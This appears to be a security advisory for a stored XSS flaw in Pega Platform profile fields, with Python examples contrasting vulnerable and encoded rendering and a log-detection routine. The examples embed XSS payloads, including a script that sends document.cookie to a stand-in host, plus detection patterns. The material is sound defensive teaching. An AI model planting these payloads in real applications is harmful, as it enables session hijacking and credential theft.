CVE-2024-12211
📋 TL;DR
Pega Platform versions 8.1 through Infinity 24.2.0 contain a stored cross-site scripting (XSS) vulnerability in the profile functionality. A user who can edit profile fields can store script that executes in the browser of every user who later views the affected profile. Any organization running a Pega Platform deployment in the affected version range is exposed.
💻 Affected Systems
- Pega Platform
📦 What is this software?
Pega Platform is Pegasystems' low-code platform for building business process management, case management and CRM applications. The affected component is its profile functionality: the user-editable profile fields that are rendered to other users.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as authenticated users, deface interfaces, or redirect users to malicious sites through persistent script execution.
Likely Case
Attackers with access to profile editing could inject scripts that execute when other users view those profiles, potentially leading to session hijacking or credential theft.
If Mitigated
With output encoding applied wherever profile content is rendered, a stored payload is displayed as inert text rather than executed; input validation on profile fields additionally limits what an attacker can store. With both in place, exploitation fails.
🎯 Exploit Status
Requires an authenticated account with permission to edit profile fields. Exploitation consists of saving a script payload in a profile field; the payload then runs in the browser of each user who views that profile.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Infinity 24.2.1 and later
Vendor Advisory: https://support.pega.com/support-doc/pega-security-advisory-f24-vulnerability-remediation-note
Restart Required: Yes
Instructions:
1. Upgrade to Pega Platform Infinity 24.2.1 or later.
2. Apply the patch following Pega's deployment procedures.
3. Restart the application servers.
4. Verify the fix is applied: confirm the running version and re-test profile fields as described under How to Verify.
🔧 Temporary Workarounds
Input Validation Enhancement
Implement additional input validation on profile fields to reject or sanitize script content, by customizing the Pega validation rules for those fields. Validation alone is bypassable through encoding and context tricks, so treat it as defence in depth rather than the fix.
Output Encoding
Apply HTML output encoding, appropriate to the HTML context (element text, attribute value, URL), wherever profile content is displayed, so that stored script is rendered as inert text. Configure the Pega components that display profile fields to encode their output; this is the control that neutralizes payloads already stored.
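The two workarounds above in working form, as an added example that is not part of this advisory or of Pega's code: a rendering routine that concatenates stored profile values (the stored XSS pattern) next to a hardened one that encodes per HTML context and scheme-checks link targets. The profile field names and the attacker values are constructed for the demonstration; the checker at the end tokenizes the rendered markup the way a browser roughly would, to show which output still carries something executable.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed attacker-controlled profile values (not a real Pega record; the
# field names are assumptions for this demonstration). Each one targets a
# different HTML context: element text, a quoted attribute, and an href.
ATTACKER_PROFILE = {
    "display_name": '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
    "title": 'x" onmouseover="alert(document.domain)',
    "website": "javascript:alert(document.domain)",
}

SAFE_URL_SCHEMES = ("http", "https")


def render_profile_vulnerable(profile):
    """Concatenates raw stored values into markup: the stored XSS pattern."""
    return (
        '<div class="profile">'
        f'<h1>{profile["display_name"]}</h1>'
        f'<p title="{profile["title"]}">{profile["title"]}</p>'
        f'<a href="{profile["website"]}">site</a>'
        "</div>"
    )


def safe_href(value):
    """Allow only absolute http(s) URLs in href; javascript:, data: and
    similar schemes are replaced with an inert fragment link."""
    if urlsplit(value.strip()).scheme.lower() not in SAFE_URL_SCHEMES:
        return "#"
    return html.escape(value, quote=True)


def render_profile_hardened(profile):
    """Context-aware output encoding: text and attribute values are HTML-escaped
    with quotes included, and href values are scheme-checked before escaping."""
    name = html.escape(profile["display_name"], quote=True)
    title = html.escape(profile["title"], quote=True)
    return (
        '<div class="profile">'
        f"<h1>{name}</h1>"
        f'<p title="{title}">{title}</p>'
        f'<a href="{safe_href(profile["website"])}">site</a>'
        "</div>"
    )


class ActiveContentFinder(HTMLParser):
    """Tokenizes rendered markup roughly as a browser would and records what
    would execute: script elements, on* handler attributes, javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name}")


def find_active_content(rendered_html):
    """Return the list of executable constructs found in rendered markup."""
    finder = ActiveContentFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_profile_vulnerable),
                          ("hardened", render_profile_hardened)):
        out = render(ATTACKER_PROFILE)
        print(f"{label}: {find_active_content(out) or 'no active content'}")
```

The point of the three fields is that one encoding routine does not fit every context: escaping quotes is what stops the attribute break-out in title, and escaping alone does nothing for an href, where a javascript: scheme is a valid, already-encoded value, so the link target needs a scheme allow-list.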
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads in profile update requests; keyword rules are evaded with encoding and alternative constructs, so this is a stop-gap, not a fix
- Restrict profile editing permissions to trusted users only
- Review existing profiles for stored script, since payloads saved before a mitigation was applied remain in place until removed or encoded on display
🔍 How to Verify
Check if Vulnerable:
Check the Pega Platform version; any version from 8.1 through Infinity 24.2.0 inclusive is vulnerable.
Check Version:
Check Pega Platform version in administrative console or via system properties
Verify Fix Applied:
Confirm the running version is Infinity 24.2.1 or later, then, in a non-production environment, save a harmless test payload in a profile field and confirm it is displayed as encoded text rather than executed when the profile is viewed.
📡 Detection & Monitoring
Log Indicators:
- Unusual profile modifications (bursts of edits, or edits from accounts that rarely change their profile)
- Script-like content in profile update requests: tags, event-handler attributes (on...=), javascript: URLs, and URL- or entity-encoded forms of these
Network Indicators:
- HTTP requests to profile update endpoints whose parameters contain script tags or their encoded equivalents
SIEM Query:
source="pega_logs" AND (event="profile_update" AND (message="*<script*" OR message="*javascript:*"))
The source, event and message fields above are placeholders to adapt to your log schema. A bare keyword match like this misses event-handler attributes and any encoded payload; decode the field before matching, or broaden the pattern list.
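The detection logic run over sample log lines, as an added example that is not part of this advisory and does not reflect Pega's actual log format: the log lines, the key=value layout and the event and field names are constructed for the demonstration. The naive function is the SIEM query above taken literally; the normalized one URL- and entity-decodes the value until stable and then matches a broader pattern set, which is what catches the encoded and event-handler payloads the keyword query misses.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in key=value form (not real Pega log output; the
# event and field names are assumptions for this demonstration).
SAMPLE_LOGS = [
    'ts=2025-01-10T09:00:01Z event=profile_update user=alice field=display_name value="Alice Smith"',
    'ts=2025-01-10T09:00:07Z event=profile_update user=mallory field=display_name value="<script>document.location=\'https://evil.example/?c=\'+document.cookie</script>"',
    'ts=2025-01-10T09:00:12Z event=profile_update user=mallory field=title value="<img src=x onerror=alert(document.domain)>"',
    'ts=2025-01-10T09:00:20Z event=profile_update user=mallory field=website value="%3Cscript%3Ealert(1)%3C%2Fscript%3E"',
    'ts=2025-01-10T09:00:25Z event=profile_update user=mallory field=bio value="&lt;svg onload=alert(1)&gt;"',
    'ts=2025-01-10T09:00:31Z event=profile_update user=mallory field=website value="java&#115;cript:alert(1)"',
    'ts=2025-01-10T09:01:00Z event=login user=bob result=ok',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructs that execute in a browser, matched against decoded, lowercased text.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b"),
    "event_handler": re.compile(r"\bon\w+\s*="),
    "javascript_url": re.compile(r"javascript\s*:"),
    "active_element": re.compile(r"<\s*(svg|iframe|object|embed)\b"),
}


def parse_line(line):
    """Split a key=value log line into a dict, stripping quotes from values."""
    return {k: v[1:-1] if v.startswith('"') else v for k, v in KV_RE.findall(line)}


def normalize(value):
    """Undo the encodings an attacker stacks to slip past keyword matching:
    URL-decode and HTML-entity-decode until stable, then lowercase and collapse
    whitespace and NUL bytes that split keywords."""
    cur = value
    for _ in range(3):
        decoded = html.unescape(unquote_plus(cur))
        if decoded == cur:
            break
        cur = decoded
    return re.sub(r"[\s\x00]+", " ", cur.lower())


def naive_query(records):
    """The SIEM query above taken literally: substring match on two keywords.
    Returns the timestamps of flagged profile updates."""
    return [r["ts"] for r in records
            if r.get("event") == "profile_update"
            and ("<script" in r.get("value", "") or "javascript:" in r.get("value", ""))]


def normalized_query(records):
    """Decode first, then match the broader pattern set. Returns one
    (ts, user, field, matched pattern names) tuple per flagged update."""
    hits = []
    for r in records:
        if r.get("event") != "profile_update":
            continue
        text = normalize(r.get("value", ""))
        matched = [name for name, rx in PATTERNS.items() if rx.search(text)]
        if matched:
            hits.append((r["ts"], r["user"], r["field"], matched))
    return hits


if __name__ == "__main__":
    records = [parse_line(line) for line in SAMPLE_LOGS]
    print("naive keyword match flags:", naive_query(records))
    for hit in normalized_query(records):
        print("normalized match:", hit)
```

Of the five malicious updates in the sample, the literal query flags one; the decoded match flags all five. The `\b` before `on` in the event-handler pattern matters: without it, ordinary words such as "monkey=" or "location=" match and the rule drowns in false positives.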